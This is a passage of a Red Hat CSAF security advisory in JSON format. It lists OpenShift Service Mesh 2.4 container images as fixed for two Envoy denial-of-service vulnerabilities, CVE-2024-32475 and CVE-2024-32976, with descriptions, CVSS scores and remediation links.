"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
